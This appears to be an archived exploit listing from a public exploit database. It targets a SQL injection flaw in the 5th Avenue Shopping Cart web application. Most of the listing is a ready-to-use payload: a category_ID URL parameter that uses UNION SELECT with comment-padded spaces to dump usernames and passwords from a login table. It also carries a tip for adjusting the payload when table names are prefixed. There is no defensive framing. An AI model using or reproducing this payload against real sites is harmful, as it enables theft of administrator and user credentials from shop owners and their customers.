5th Avenue Shopping Cart (category_ID) SQL Injection Vulnerability

2008-04-18T00:00:00
ID 1337DAY-ID-2891
Type zdt
Reporter 0day Today Team
Modified 2008-04-18T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
5th Avenue Shopping Cart (category_ID) SQL Injection Vulnerability
==================================================================



5th avenue Shopping Cart SQL Injection

Greetz: AurA, Kinglet, NULL


category_list.php?category_ID=-1/**/UNION/**/SELECT/**/1,username,password,4,5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/login/*

note: if error says :table login does not exist the website is using a prefix for tables.




#  0day.today [2017-12-31]  #